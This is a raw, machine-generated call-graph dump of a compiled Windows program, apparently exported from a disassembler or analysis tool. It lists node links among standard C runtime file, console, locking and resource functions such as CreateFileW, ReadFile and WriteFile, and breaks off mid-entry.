98212->98210 98214 7654ac _wprintf 98213->98214 98215 7654bf 98214->98215 98218 7654f0 98214->98218 98262 768d68 58 API calls __getptd_noexit 98215->98262 98217 7654c4 98263 768ff6 9 API calls _wprintf 98217->98263 98232 770738 98218->98232 98221 7654f5 98222 7654fe 98221->98222 98223 76550b 98221->98223 98264 768d68 58 API calls __getptd_noexit 98222->98264 98224 765535 98223->98224 98225 765515 98223->98225 98247 770857 98224->98247 98265 768d68 58 API calls __getptd_noexit 98225->98265 98229 7654cf _wprintf @_EH4_CallFilterFunc@8 98229->98169 98233 770744 _wprintf 98232->98233 98234 769e4b __lock 58 API calls 98233->98234 98245 770752 98234->98245 98235 7707c6 98267 77084e 98235->98267 98236 7707cd 98272 768a5d 58 API calls 2 library calls 98236->98272 98239 770843 _wprintf 98239->98221 98240 7707d4 98240->98235 98273 76a06b InitializeCriticalSectionAndSpinCount 98240->98273 98242 769ed3 __mtinitlocknum 58 API calls 98242->98245 98244 7707fa EnterCriticalSection 98244->98235 98245->98235 98245->98236 98245->98242 98270 766e8d 59 API calls __lock 98245->98270 98271 766ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98245->98271 98256 770877 __wopenfile 98247->98256 98248 770891 98278 768d68 58 API calls __getptd_noexit 98248->98278 98250 770a4c 98250->98248 98254 770aaf 98250->98254 98251 770896 98279 768ff6 9 API calls _wprintf 98251->98279 98253 765540 98266 765562 LeaveCriticalSection LeaveCriticalSection _fseek 98253->98266 98275 7787f1 98254->98275 98256->98248 98256->98250 98256->98256 98280 763a0b 60 API calls 2 library calls 98256->98280 98258 770a45 98258->98250 98281 763a0b 60 API calls 2 library calls 98258->98281 98260 770a64 98260->98250 98282 763a0b 60 API calls 2 library calls 98260->98282 98262->98217 98263->98229 98264->98229 98265->98229 98266->98229 98274 769fb5 LeaveCriticalSection 98267->98274 98269 770855 98269->98239 98270->98245 98271->98245 98272->98240 98273->98244 98274->98269 98283 777fd5 98275->98283 98277 77880a 98277->98253 98278->98251 98279->98253 98280->98258 98281->98260 98282->98250 98285 777fe1 _wprintf 98283->98285 98284 777ff7 98368 768d68 58 API calls __getptd_noexit 98284->98368 98285->98284 98287 77802d 98285->98287 98294 77809e 98287->98294 98288 777ffc 98369 768ff6 9 API calls _wprintf 98288->98369 98291 778049 98370 778072 LeaveCriticalSection __unlock_fhandle 98291->98370 98293 778006 _wprintf 98293->98277 98295 7780be 98294->98295 98296 76471a __wsopen_nolock 58 API calls 98295->98296 98299 7780da 98296->98299 98297 769006 __invoke_watson 8 API calls 98298 7787f0 98297->98298 98301 777fd5 __wsopen_helper 103 API calls 98298->98301 98300 778114 98299->98300 98307 778137 98299->98307 98342 778211 98299->98342 98302 768d34 __read 58 API calls 98300->98302 98303 77880a 98301->98303 98304 778119 98302->98304 98303->98291 98305 768d68 _wprintf 58 API calls 98304->98305 98306 778126 98305->98306 98309 768ff6 _wprintf 9 API calls 98306->98309 98308 7781f5 98307->98308 98316 7781d3 98307->98316 98310 768d34 __read 58 API calls 98308->98310 98311 778130 98309->98311 98312 7781fa 98310->98312 98311->98291 98313 768d68 _wprintf 58 API calls 98312->98313 98314 778207 98313->98314 98315 768ff6 _wprintf 9 API calls 98314->98315 98315->98342 98317 76d4d4 __alloc_osfhnd 61 API calls 98316->98317 98318 7782a1 98317->98318 98319 7782ce 98318->98319 98320 7782ab 98318->98320 98322 777f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98319->98322 98321 768d34 __read 58 API calls 98320->98321 98323 7782b0 98321->98323 98333 7782f0 98322->98333 98324 768d68 _wprintf 58 API calls 98323->98324 98326 7782ba 98324->98326 98325 77836e GetFileType 98327 7783bb 98325->98327 98328 778379 GetLastError 98325->98328 98331 768d68 _wprintf 58 API calls 98326->98331 98336 76d76a __set_osfhnd 59 API calls 98327->98336 98332 768d47 __dosmaperr 58 API calls 98328->98332 98329 77833c GetLastError 98330 768d47 __dosmaperr 58 API calls 98329->98330 98337 778361 98330->98337 98331->98311 98334 7783a0 CloseHandle 98332->98334 98333->98325 98333->98329 98335 777f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98333->98335 98334->98337 98338 7783ae 98334->98338 98339 778331 98335->98339 98345 7783d9 98336->98345 98340 768d68 _wprintf 58 API calls 98337->98340 98341 768d68 _wprintf 58 API calls 98338->98341 98339->98325 98339->98329 98340->98342 98343 7783b3 98341->98343 98342->98297 98343->98337 98344 778594 98344->98342 98347 778767 CloseHandle 98344->98347 98345->98344 98346 771b11 __lseeki64_nolock 60 API calls 98345->98346 98362 77845a 98345->98362 98348 778443 98346->98348 98349 777f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98347->98349 98351 768d34 __read 58 API calls 98348->98351 98348->98362 98350 77878e 98349->98350 98352 778796 GetLastError 98350->98352 98353 7787c2 98350->98353 98351->98362 98354 768d47 __dosmaperr 58 API calls 98352->98354 98353->98342 98356 7787a2 98354->98356 98355 77848c 98359 7799f2 __chsize_nolock 82 API calls 98355->98359 98355->98362 98360 76d67d __free_osfhnd 59 API calls 98356->98360 98357 7710ab 70 API calls __read_nolock 98357->98362 98358 770d2d __close_nolock 61 API calls 98358->98362 98359->98355 98360->98353 98361 771b11 60 API calls __lseeki64_nolock 98361->98362 98362->98344 98362->98355 98362->98357 98362->98358 98362->98361 98363 76dac6 __write 78 API calls 98362->98363 98364 778611 98362->98364 98363->98362 98365 770d2d __close_nolock 61 API calls 98364->98365 98366 778618 98365->98366 98367 768d68 _wprintf 58 API calls 98366->98367 98367->98342 98368->98288 98369->98293 98370->98293 98372 744ce1 98371->98372 98373 744d9d LoadLibraryA 98371->98373 98372->98173 98372->98176 98373->98372 98374 744dae GetProcAddress 98373->98374 98374->98372 98376 760ff6 Mailbox 59 API calls 98375->98376 98377 7453a0 98376->98377 98377->98181 98379 745003 FindResourceExW 98378->98379 98383 745020 98378->98383 98380 77dd5c LoadResource 98379->98380 98379->98383 98381 77dd71 SizeofResource 98380->98381 98380->98383 98382 77dd85 LockResource 98381->98382 98381->98383 98382->98383 98383->98187 98385 745054 98384->98385 98386 77ddd4 98384->98386 98390 765a7d 98385->98390 98388 745062 98388->98193 98389->98187 98391 765a89 _wprintf 98390->98391 98392 765a9b 98391->98392 98393 765ac1 98391->98393 98403 768d68 58 API calls __getptd_noexit 98392->98403 98405 766e4e 98393->98405 98396 765aa0 98404 768ff6 9 API calls _wprintf 98396->98404 98398 765ac7 98411 7659ee 83 API calls 4 library calls 98398->98411 98400 765ad6 98412 765af8 LeaveCriticalSection LeaveCriticalSection _fseek 98400->98412 98402 765aab _wprintf 98402->98388 98403->98396 98404->98402 98406 766e80 EnterCriticalSection 98405->98406 98407 766e5e 98405->98407 98408 766e76 98406->98408 98407->98406 98409 766e66 98407->98409 98408->98398 98410 769e4b __lock 58 API calls 98409->98410 98410->98408 98411->98400 98412->98402 98416 76582d 98413->98416 98415 74508e 98415->98201 98417 765839 _wprintf 98416->98417 98418 76587c 98417->98418 98419 765874 _wprintf 98417->98419 98422 76584f _memset 98417->98422 98420 766e4e __lock_file 59 API calls 98418->98420 98419->98415 98421 765882 98420->98421 98429 76564d 98421->98429 98443 768d68 58 API calls __getptd_noexit 98422->98443 98425 765869 98444 768ff6 9 API calls _wprintf 98425->98444 98433 765668 _memset 98429->98433 98436 765683 98429->98436 98430 765673 98541 768d68 58 API calls __getptd_noexit 98430->98541 98432 765678 98542 768ff6 9 API calls _wprintf 98432->98542 98433->98430 98433->98436 98441 7656c3 98433->98441 98445 7658b6 LeaveCriticalSection LeaveCriticalSection _fseek 98436->98445 98437 7657d4 _memset 98544 768d68 58 API calls __getptd_noexit 98437->98544 98441->98436 98441->98437 98446 764916 98441->98446 98453 7710ab 98441->98453 98521 770df7 98441->98521 98543 770f18 58 API calls 3 library calls 98441->98543 98443->98425 98444->98419 98445->98419 98447 764935 98446->98447 98448 764920 98446->98448 98447->98441 98545 768d68 58 API calls __getptd_noexit 98448->98545 98450 764925 98546 768ff6 9 API calls _wprintf 98450->98546 98452 764930 98452->98441 98454 7710e3 98453->98454 98455 7710cc 98453->98455 98457 77181b 98454->98457 98460 77111d 98454->98460 98556 768d34 58 API calls __getptd_noexit 98455->98556 98572 768d34 58 API calls __getptd_noexit 98457->98572 98459 7710d1 98557 768d68 58 API calls __getptd_noexit 98459->98557 98463 771125 98460->98463 98470 77113c 98460->98470 98461 771820 98573 768d68 58 API calls __getptd_noexit 98461->98573 98558 768d34 58 API calls __getptd_noexit 98463->98558 98466 771131 98574 768ff6 9 API calls _wprintf 98466->98574 98467 77112a 98559 768d68 58 API calls __getptd_noexit 98467->98559 98469 771151 98560 768d34 58 API calls __getptd_noexit 98469->98560 98470->98469 98473 77116b 98470->98473 98474 771189 98470->98474 98501 7710d8 98470->98501 98473->98469 98476 771176 98473->98476 98561 768a5d 58 API calls 2 library calls 98474->98561 98547 775ebb 98476->98547 98477 771199 98479 7711a1 98477->98479 98480 7711bc 98477->98480 98562 768d68 58 API calls __getptd_noexit 98479->98562 98564 771b11 60 API calls 3 library calls 98480->98564 98481 77128a 98483 771303 ReadFile 98481->98483 98488 7712a0 GetConsoleMode 98481->98488 98486 771325 98483->98486 98487 7717e3 GetLastError 98483->98487 98485 7711a6 98563 768d34 58 API calls __getptd_noexit 98485->98563 98486->98487 98495 7712f5 98486->98495 98490 7712e3 98487->98490 98491 7717f0 98487->98491 98492 7712b4 98488->98492 98493 771300 98488->98493 98503 7712e9 98490->98503 98565 768d47 58 API calls 3 library calls 98490->98565 98570 768d68 58 API calls __getptd_noexit 98491->98570 98492->98493 98494 7712ba ReadConsoleW 98492->98494 98493->98483 98494->98495 98497 7712dd GetLastError 98494->98497 98495->98503 98504 77135a 98495->98504 98505 7715c7 98495->98505 98497->98490 98499 7717f5 98571 768d34 58 API calls __getptd_noexit 98499->98571 98501->98441 98502 762f95 _free 58 API calls 98502->98501 98503->98501 98503->98502 98507 7713c6 ReadFile 98504->98507 98513 771447 98504->98513 98505->98503 98508 7716cd ReadFile 98505->98508 98509 7713e7 GetLastError 98507->98509 98519 7713f1 98507->98519 98512 7716f0 GetLastError 98508->98512 98520 7716fe 98508->98520 98509->98519 98510 771504 98515 7714b4 MultiByteToWideChar 98510->98515 98568 771b11 60 API calls 3 library calls 98510->98568 98511 7714f4 98567 768d68 58 API calls __getptd_noexit 98511->98567 98512->98520 98513->98503 98513->98510 98513->98511 98513->98515 98515->98497 98515->98503 98519->98504 98566 771b11 60 API calls 3 library calls 98519->98566 98520->98505 98569 771b11 60 API calls 3 library calls 98520->98569 98522 770e02 98521->98522 98526 770e17 98521->98526 98608 768d68 58 API calls __getptd_noexit 98522->98608 98524 770e07 98609 768ff6 9 API calls _wprintf 98524->98609 98527 770e4c 98526->98527 98533 770e12 98526->98533 98610 776234 58 API calls __malloc_crt 98526->98610 98529 764916 __ftell_nolock 58 API calls 98527->98529 98530 770e60 98529->98530 98575 770f97 98530->98575 98532 770e67 98532->98533 98534 764916 __ftell_nolock 58 API calls 98532->98534 98533->98441 98535 770e8a 98534->98535 98535->98533 98536 764916 __ftell_nolock 58 API calls 98535->98536 98537 770e96 98536->98537 98537->98533 98538 764916 __ftell_nolock 58 API calls 98537->98538 98539 770ea3 98538->98539 98540 764916 __ftell_nolock 58 API calls 98539->98540 98540->98533 98541->98432 98542->98436 98543->98441 98544->98432 98545->98450 98546->98452 98548 775ec6 98547->98548 98550 775ed3 98547->98550 98549 768d68 _wprintf 58 API calls 98548->98549 98551 775ecb 98549->98551 98552 775edf 98550->98552 98553 768d68 _wprintf 58 API calls 98550->98553 98551->98481 98552->98481 98554 775f00 98553->98554 98555 768ff6 _wprintf 9 API calls 98554->98555 98555->98551 98556->98459 98557->98501 98558->98467 98559->98466 98560->98467 98561->98477 98562->98485 98563->98501 98564->98476 98565->98503 98566->98519 98567->98503 98568->98515 98569->98520 98570->98499 98571->98503 98572->98461 98573->98466 98574->98501 98576 770fa3 _wprintf 98575->98576 98577 770fc7 98576->98577 98578 770fb0 98576->98578 98579 77108b 98577->98579 98581 770fdb 98577->98581 98580 768d34 __read 58 API calls 98578->98580 98582 768d34 __read 58 API calls 98579->98582 98583 770fb5 98580->98583 98584 771006 98581->98584 98585 770ff9 98581->98585 98586 770ffe 98582->98586 98587 768d68 _wprintf 58 API calls 98583->98587 98589 771013 98584->98589 98590 771028 98584->98590 98588 768d34 __read 58 API calls 98585->98588 98593 768d68 _wprintf 58 API calls 98586->98593 98597 770fbc _wprintf 98587->98597 98588->98586 98591 768d34 __read 58 API calls 98589->98591 98592 76d446 ___lock_fhandle 59 API calls 98590->98592 98594 771018 98591->98594 98595 77102e 98592->98595 98596 771020 98593->98596 98598 768d68 _wprintf 58 API calls 98594->98598 98599 771054 98595->98599 98600 771041 98595->98600 98602 768ff6 _wprintf 9 API calls 98596->98602 98597->98532 98598->98596 98603 768d68 _wprintf 58 API calls 98599->98603 98601 7710ab __read_nolock 70 API calls 98600->98601 98604 77104d 98601->98604 98602->98597 98605 771059 98603->98605 98607 771083 __read LeaveCriticalSection 98604->98607 98606 768d34 __read 58 API calls 98605->98606 98606->98604 98607->98597 98608->98524 98609->98533 98610->98527 98614 76543a GetSystemTimeAsFileTime 98611->98614 98613 7a91f8 98613->98203 98615 765468 __aulldiv 98614->98615 98615->98613 98617 765e9c _wprintf 98616->98617 98618 765ec3 98617->98618 98619 765eae 98617->98619 98620 766e4e __lock_file 59 API calls 98618->98620 98630 768d68 58 API calls __getptd_noexit 98619->98630 98622 765ec9 98620->98622 98632 765b00 67 API calls 4 library calls 98622->98632 98623 765eb3 98631 768ff6 9 API calls _wprintf 98623->98631 98626 765ebe _wprintf 98626->98208 98627 765ed4 98633 765ef4 LeaveCriticalSection LeaveCriticalSection _fseek 98627->98633 98629 765ee6 98629->98626 98630->98623 98631->98626 98632->98627 98633->98629 98634->98065 98635->98073 98636->98086 98637->98089 98638->98085 98639->98094 98641 7492c9 Mailbox 98640->98641 98642 77f5c8 98641->98642 98647 7492d3 98641->98647 98643 760ff6 Mailbox 59 API calls 98642->98643 98645 77f5d4 98643->98645 98644 7492da 98644->98098 98647->98644 98648 749df0 59 API calls Mailbox 98647->98648 98648->98647 98649->98109 98650->98103 98656 7a99d2 __tzset_nolock _wcscmp 98651->98656 98652 74506b 74 API calls 98652->98656 98653 7a9866 98653->98115 98653->98144 98654 7a9393 GetSystemTimeAsFileTime 98654->98656 98655 745045 85 API calls 98655->98656 98656->98652 98656->98653 98656->98654 98656->98655 98658 7a8da9 98657->98658 98659 7a8d9b 98657->98659 98661 7a8dee 98658->98661 98662 76548b 115 API calls 98658->98662 98687 7a8db2 98658->98687 98660 76548b 115 API calls 98659->98660 98660->98658 98688 7a901b 98661->98688 98664 7a8dd3 98662->98664 98664->98661 98666 7a8ddc 98664->98666 98665 7a8e32 98667 7a8e36 98665->98667 98668 7a8e57 98665->98668 98669 7655d6 __fcloseall 83 API calls 98666->98669 98666->98687 98672 7655d6 __fcloseall 83 API calls 98667->98672 98673 7a8e43 98667->98673 98692 7a8c33 98668->98692 98669->98687 98672->98673 98676 7655d6 __fcloseall 83 API calls 98673->98676 98673->98687 98674 7a8e85 98701 7a8eb5 98674->98701 98675 7a8e65 98677 7a8e72 98675->98677 98679 7655d6 __fcloseall 83 API calls 98675->98679 98676->98687 98681 7655d6 __fcloseall 83 API calls 98677->98681 98677->98687 98679->98677 98681->98687 98684 7a8ea0 98686 7655d6 __fcloseall 83 API calls 98684->98686 98684->98687 98686->98687 98687->98143 98689 7a9040 98688->98689 98691 7a9029 __tzset_nolock _memmove 98688->98691 98690 765812 __fread_nolock 74 API calls 98689->98690 98690->98691 98691->98665 98693 76594c __crtGetStringTypeA_stat 58 API calls 98692->98693 98694 7a8c42 98693->98694 98695 76594c __crtGetStringTypeA_stat 58 API calls 98694->98695 98696 7a8c56 98695->98696 98697 76594c __crtGetStringTypeA_stat 58 API calls 98696->98697 98698 7a8c6a 98697->98698 98699 7a8f97 58 API calls 98698->98699 98700 7a8c7d 98698->98700 98699->98700 98700->98674 98700->98675 98705 7a8eca 98701->98705 98702 7a8f82 98734 7a91bf 98702->98734 98703 7a8c8f 74 API calls 98703->98705 98705->98702 98705->98703 98708 7a8e8c 98705->98708 98730 7a909c 98705->98730 98738 7a8d2b 74 API calls 98705->98738 98709 7a8f97 98708->98709 98710 7a8fa4 98709->98710 98713 7a8faa 98709->98713 98711 762f95 _free 58 API calls 98710->98711 98711->98713 98712 7a8fbb 98715 7a8e93 98712->98715 98716 762f95 _free 58 API calls 98712->98716 98713->98712 98714 762f95 _free 58 API calls 98713->98714 98714->98712 98715->98684 98717 7655d6 98715->98717 98716->98715 98718 7655e2 _wprintf 98717->98718 98719 7655f6 98718->98719 98720 76560e 98718->98720 98787 768d68 58 API calls __getptd_noexit 98719->98787 98722 766e4e __lock_file 59 API calls 98720->98722 98726 765606 _wprintf 98720->98726 98724 765620 98722->98724 98723 7655fb 98788 768ff6 9 API calls _wprintf 98723->98788 98771 76556a 98724->98771 98726->98684 98732 7a90ab 98730->98732 98733 7a90eb 98730->98733 98732->98705 98733->98732 98739 7a9172 98733->98739 98735 7a91cc 98734->98735 98736 7a91dd 98734->98736 98737 764a93 80 API calls 98735->98737 98736->98708 98737->98736 98738->98705 98740 7a919e 98739->98740 98742 7a91af 98739->98742 98743 764a93 98740->98743 98742->98733 98744 764a9f _wprintf 98743->98744 98745 764ad5 98744->98745 98746 764abd 98744->98746 98748 764acd _wprintf 98744->98748 98749 766e4e __lock_file 59 API calls 98745->98749 98768 768d68 58 API calls __getptd_noexit 98746->98768 98748->98742 98751 764adb 98749->98751 98750 764ac2 98769 768ff6 9 API calls _wprintf 98750->98769 98756 76493a 98751->98756 98759 764949 98756->98759 98763 764967 98756->98763 98757 764957 98758 768d68 _wprintf 58 API calls 98757->98758 98760 76495c 98758->98760 98759->98757 98759->98763 98766 764981 _memmove 98759->98766 98761 768ff6 _wprintf 9 API calls 98760->98761 98761->98763 98762 76b05e __flsbuf 78 API calls 98762->98766 98770 764b0d LeaveCriticalSection LeaveCriticalSection _fseek 98763->98770 98764 764c6d __flush 78 API calls 98764->98766 98765 764916 __ftell_nolock 58 API calls 98765->98766 98766->98762 98766->98763 98766->98764 98766->98765 98767 76dac6 __write 78 API calls 98766->98767 98767->98766 98768->98750 98769->98748 98770->98748 98772 76558d 98771->98772 98773 765579 98771->98773 98780 765589 98772->98780 98790 764c6d 98772->98790 98826 768d68 58 API calls __getptd_noexit 98773->98826 98775 76557e 98827 768ff6 9 API calls _wprintf 98775->98827 98789 765645 LeaveCriticalSection LeaveCriticalSection _fseek 98780->98789 98782 764916 __ftell_nolock 58 API calls 98783 7655a7 98782->98783 98800 770c52 98783->98800 98785 7655ad 98785->98780 98786 762f95 _free 58 API calls 98785->98786 98786->98780 98787->98723 98788->98726 98789->98726 98791 764c80 98790->98791 98792 764ca4 98790->98792 98791->98792 98793 764916 __ftell_nolock 58 API calls 98791->98793 98796 770dc7 98792->98796 98794 764c9d 98793->98794 98828 76dac6 98794->98828 98797 7655a1 98796->98797 98798 770dd4 98796->98798 98797->98782 98798->98797 98799 762f95 _free 58 API calls 98798->98799 98799->98797 98801 770c5e _wprintf 98800->98801 98802 770c82 98801->98802 98803 770c6b 98801->98803 98804 770d0d 98802->98804 98806 770c92 98802->98806 98953 768d34 58 API calls __getptd_noexit 98803->98953 98958 768d34 58 API calls __getptd_noexit 98804->98958 98810 770cb0 98806->98810 98811 770cba 98806->98811 98808 770c70 98954 768d68 58 API calls __getptd_noexit 98808->98954 98955 768d34 58 API calls __getptd_noexit 98810->98955 98814 76d446 ___lock_fhandle 59 API calls 98811->98814 98812 770cb5 98959 768d68 58 API calls __getptd_noexit 98812->98959 98816 770cc0 98814->98816 98818 770cd3 98816->98818 98819 770cde 98816->98819 98817 770d19 98960 768ff6 9 API calls _wprintf 98817->98960 98938 770d2d 98818->98938 98956 768d68 58 API calls __getptd_noexit 98819->98956 98820 770c77 _wprintf 98820->98785 98824 770cd9 98957 770d05 LeaveCriticalSection __unlock_fhandle 98824->98957 98826->98775 98827->98780 98829 76dad2 _wprintf 98828->98829 98830 76daf6 98829->98830 98831 76dadf 98829->98831 98833 76db95 98830->98833 98834 76db0a 98830->98834 98929 768d34 58 API calls __getptd_noexit 98831->98929 98935 768d34 58 API calls __getptd_noexit 98833->98935 98837 76db32 98834->98837 98838 76db28 98834->98838 98836 76dae4 98930 768d68 58 API calls __getptd_noexit 98836->98930 98856 76d446 98837->98856 98931 768d34 58 API calls __getptd_noexit 98838->98931 98839 76db2d 98936 768d68 58 API calls __getptd_noexit 98839->98936 98843 76db38 98845 76db5e 98843->98845 98846 76db4b 98843->98846 98932 768d68 58 API calls __getptd_noexit 98845->98932 98865 76dbb5 98846->98865 98847 76dba1 98937 768ff6 9 API calls _wprintf 98847->98937 98851 76daeb _wprintf 98851->98792 98852 76db57 98934 76db8d LeaveCriticalSection __unlock_fhandle 98852->98934 98853 76db63 98933 768d34 58 API calls __getptd_noexit 98853->98933 98857 76d452 _wprintf 98856->98857 98858 76d4a1 EnterCriticalSection 98857->98858 98859 769e4b __lock 58 API calls 98857->98859 98860 76d4c7 _wprintf 98858->98860 98861 76d477 98859->98861 98860->98843 98862 76d48f 98861->98862 98863 76a06b __ioinit InitializeCriticalSectionAndSpinCount 98861->98863 98864 76d4cb ___lock_fhandle LeaveCriticalSection 98862->98864 98863->98862 98864->98858 98866 76dbc2 __ftell_nolock 98865->98866 98867 76dc20 98866->98867 98868 76dc01 98866->98868 98896 76dbf6 98866->98896 98871 76dc78 98867->98871 98872 76dc5c 98867->98872 98870 768d34 __read 58 API calls 98868->98870 98869 76c836 __ftell_nolock 6 API calls 98873 76e416 98869->98873 98874 76dc06 98870->98874 98876 76dc91 98871->98876 98879 771b11 __lseeki64_nolock 60 API calls 98871->98879 98875 768d34 __read 58 API calls 98872->98875 98873->98852 98877 768d68 _wprintf 58 API calls 98874->98877 98878 76dc61 98875->98878 98881 775ebb __flswbuf 58 API calls 98876->98881 98880 76dc0d 98877->98880 98882 768d68 _wprintf 58 API calls 98878->98882 98879->98876 98883 768ff6 _wprintf 9 API calls 98880->98883 98884 76dc9f 98881->98884 98886 76dc68 98882->98886 98883->98896 98885 76dff8 98884->98885 98890 769bec _LocaleUpdate::_LocaleUpdate 58 API calls 98884->98890 98887 76e016 98885->98887 98888 76e38b WriteFile 98885->98888 98889 768ff6 _wprintf 9 API calls 98886->98889 98891 76e13a 98887->98891 98899 76e02c 98887->98899 98892 76dfeb GetLastError 98888->98892 98897 76dfb8 98888->98897 98889->98896 98893 76dccb GetConsoleMode 98890->98893 98903 76e22f 98891->98903 98905 76e145 98891->98905 98892->98897 98893->98885 98895 76dd0a 98893->98895 98894 76e3c4 98894->98896 98901 768d68 _wprintf 58 API calls 98894->98901 98895->98885 98898 76dd1a GetConsoleCP 98895->98898 98896->98869 98897->98894 98897->98896 98902 76e118 98897->98902 98898->98894 98926 76dd49 98898->98926 98899->98894 98900 76e09b WriteFile 98899->98900 98900->98892 98904 76e0d8 98900->98904 98906 76e3f2 98901->98906 98907 76e123 98902->98907 98908 76e3bb 98902->98908 98903->98894 98909 76e2a4 WideCharToMultiByte 98903->98909 98904->98899 98910 76e0fc 98904->98910 98905->98894 98911 76e1aa WriteFile 98905->98911 98912 768d34 __read 58 API calls 98906->98912 98914 768d68 _wprintf 58 API calls 98907->98914 98915 768d47 __dosmaperr 58 API calls 98908->98915 98909->98892 98921 76e2eb 98909->98921 98910->98897 98911->98892 98913 76e1f9 98911->98913 98912->98896 98913->98897 98913->98905 98913->98910 98916 76e128 98914->98916 98915->98896 98918 768d34 __read 58 API calls 98916->98918 98917 76e2f3 WriteFile 98920 76e346 GetLastError 98917->98920 98917->98921 98918->98896 98919 763835 __write_nolock 58 API calls 98919->98926 98920->98921 98921->98897 98921->98903 98921->98910 98921->98917 98922 777cae WriteConsoleW CreateFileW __putwch_nolock 98927 76de9f 98922->98927 98923 77650a 60 API calls __write_nolock 98923->98926 98924 76de32 WideCharToMultiByte 98924->98897 98925 76de6d WriteFile 98924->98925 98925->98892 98925->98927 98926->98897 98926->98919 98926->98923 98926->98924 98926->98927 98927->98892 98927->98897 98927->98922 98927->98926 98928 76dec7 WriteFile 98927->98928 98928->98892 98928->98927 98929->98836 98930->98851 98931->98839 98932->98853 98933->98852 98934->98851 98935->98839 98936->98847 98937->98851 98961 76d703 98938->98961 98940 770d91 98974 76d67d 59 API calls 2 library calls 98940->98974 98942 770d3b 98942->98940 98945 76d703 __close_nolock 58 API calls 98942->98945 98952 770d6f 98942->98952 98943 76d703 __close_nolock 58 API calls 98946 770d7b FindCloseChangeNotification 98943->98946 98944 770d99 98947 770dbb 98944->98947 98975 768d47 58 API calls 3 library calls 98944->98975 98948 770d66 98945->98948 98946->98940 98949 770d87 GetLastError 98946->98949 98947->98824 98951 76d703 __close_nolock 58 API calls 98948->98951 98949->98940 98951->98952 98952->98940 98952->98943 98953->98808 98954->98820 98955->98812 98956->98824 98957->98820 98958->98812 98959->98817 98960->98820 98962 76d70e 98961->98962 98965 76d723 98961->98965 98963 768d34 __read 58 API calls 98962->98963 98964 76d713 98963->98964 98967 768d68 _wprintf 58 API calls 98964->98967 98966 768d34 __read 58 API calls 98965->98966 98968 76d748 98965->98968 98969 76d752 98966->98969 98970 76d71b 98967->98970 98968->98942 98971 768d68 _wprintf 58 API calls 98969->98971 98970->98942 98972 76d75a 98971->98972 98973 768ff6 _wprintf 9 API calls 98972->98973 98973->98970 98974->98944 98975->98947 99038 771b90 98976->99038 98979 7448f7 99040 747eec 98979->99040 98980 7448da 98981 747d2c 59 API calls 98980->98981 98983 7448e6 98981->98983 98984 747886 59 API calls 98983->98984 98985 7448f2 98984->98985 98986 7609d5 98985->98986 98987 771b90 __ftell_nolock 98986->98987 98988 7609e2 GetLongPathNameW 98987->98988 98989 747d2c 59 API calls 98988->98989 98990 74741d 98989->98990 98991 74716b 98990->98991 98992 7477c7 59 API calls 98991->98992 98993 74717d 98992->98993 98994 7448ae 60 API calls 98993->98994 98995 747188 98994->98995 98996 747193 98995->98996 98997 77ecae 98995->98997 98998 743f84 59 API calls 98996->98998 99002 77ecc8 98997->99002 99050 747a68 61 API calls 98997->99050 99000 74719f 98998->99000 99044 7434c2 99000->99044 99003 7471b2 Mailbox 99003->97880 99005 744f3d 136 API calls 99004->99005 99006 7469ef 99005->99006 99007 77e45a 99006->99007 99009 744f3d 136 API calls 99006->99009 99008 7a97e5 122 API calls 99007->99008 99010 77e46f 99008->99010 99011 746a03 99009->99011 99013 77e473 99010->99013 99014 77e490 99010->99014 99011->99007 99012 746a0b 99011->99012 99015 746a17 99012->99015 99016 77e47b 99012->99016 99017 744faa 84 API calls 99013->99017 99018 760ff6 Mailbox 59 API calls 99014->99018 99051 746bec 99015->99051 99158 7a4534 90 API calls _wprintf 99016->99158 99017->99016 99035 77e4d5 Mailbox 99018->99035 99022 77e489 99022->99014 99023 77e689 99024 762f95 _free 58 API calls 99023->99024 99025 77e691 99024->99025 99026 744faa 84 API calls 99025->99026 99031 77e69a 99026->99031 99030 762f95 _free 58 API calls 99030->99031 99031->99030 99032 744faa 84 API calls 99031->99032 99162 79fcb1 89 API calls 4 library calls 99031->99162 99032->99031 99034 747f41 59 API calls 99034->99035 99035->99023 99035->99031 99035->99034 99144 74766f 99035->99144 99152 7474bd 99035->99152 99159 79fc4d 59 API calls 2 library calls 99035->99159 99160 79fb6e 61 API calls 2 library calls 99035->99160 99161 7a7621 59 API calls Mailbox 99035->99161 99039 7448bb GetFullPathNameW 99038->99039 99039->98979 99039->98980 99041 747f06 99040->99041 99042 747ef9 99040->99042 99043 760ff6 Mailbox 59 API calls 99041->99043 99042->98983 99043->99042 99045 7434f3 _memmove 99044->99045 99046 7434d4 99044->99046 99047 760ff6 Mailbox 59 API calls 99045->99047 99048 760ff6 Mailbox 59 API calls 99046->99048 99049 74350a 99047->99049 99048->99045 99049->99003 99050->98997 99052 77e847 99051->99052 99053 746c15 99051->99053 99254 79fcb1 89 API calls 4 library calls 99052->99254 99168 745906 60 API calls Mailbox 99053->99168 99056 746c37 99169 745956 99056->99169 99057 77e85a 99255 79fcb1 89 API calls 4 library calls 99057->99255 99061 746c54 99063 7477c7 59 API calls 99061->99063 99062 77e876 99065 746cc1 99062->99065 99064 746c60 99063->99064 99182 760b9b 60 API calls __ftell_nolock 99064->99182 99067 746ccf 99065->99067 99068 77e889 99065->99068 99071 7477c7 59 API calls 99067->99071 99070 745dcf CloseHandle 99068->99070 99069 746c6c 99072 7477c7 59 API calls 99069->99072 99074 77e895 99070->99074 99075 746cd8 99071->99075 99073 746c78 99072->99073 99076 7448ae 60 API calls 99073->99076 99077 744f3d 136 API calls 99074->99077 99078 7477c7 59 API calls 99075->99078 99079 746c86 99076->99079 99080 77e8b1 99077->99080 99081 746ce1 99078->99081 99183 7459b0 ReadFile SetFilePointerEx 99079->99183 99083 77e8da 99080->99083 99086 7a97e5 122 API calls 99080->99086 99192 7446f9 99081->99192 99256 79fcb1 89 API calls 4 library calls 99083->99256 99085 746cb2 99184 745c4e 99085->99184 99091 77e8cd 99086->99091 99089 77e8f1 99122 746e6c Mailbox 99089->99122 99093 77e8f6 99091->99093 99094 77e8d5 99091->99094 99096 744faa 84 API calls 99093->99096 99097 744faa 84 API calls 99094->99097 99098 77e8fb 99096->99098 99097->99083 99099 760ff6 Mailbox 59 API calls 99098->99099 99106 77e92f 99099->99106 99103 743bcd 99103->97739 99103->97747 99107 74766f 59 API calls 99106->99107 99141 77e978 Mailbox 99107->99141 99111 77eb69 99261 7a7581 59 API calls Mailbox 99111->99261 99115 77eb8b 99262 7af835 59 API calls 2 